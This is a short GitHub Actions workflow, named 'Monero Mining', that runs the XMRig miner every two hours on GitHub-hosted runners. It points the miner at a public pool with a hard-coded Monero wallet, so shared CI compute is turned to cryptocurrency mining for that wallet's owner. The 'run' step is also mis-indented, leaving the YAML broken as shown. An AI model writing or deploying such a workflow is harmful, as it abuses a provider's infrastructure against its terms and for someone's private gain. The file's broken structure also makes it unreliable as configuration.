name: Monero Mining

on:
  schedule:
    - cron: '0 */2 * * *' # Schedule to run every 2 hours

jobs:
  monero-mining:
    runs-on: ubuntu-latest
    steps:
    - name: Set up Git repository
      uses: actions/checkout@v2
    - name: Set up XMRig
      uses: xmrig/xmrig-setup@v1
    - name: Run XMRig
          run: |
        cd xmrig
        ./xmrig -o stratum+tcp://pool.herominers.com:10190 -u 47ZWyACiEjr96niR3MUZgdWYac7AvuDRx3x9PFPjKVrgSripMvygvKffk8F83XfByZdbsC3Frx3HvT8ZKwLMFcqTQidRPU9
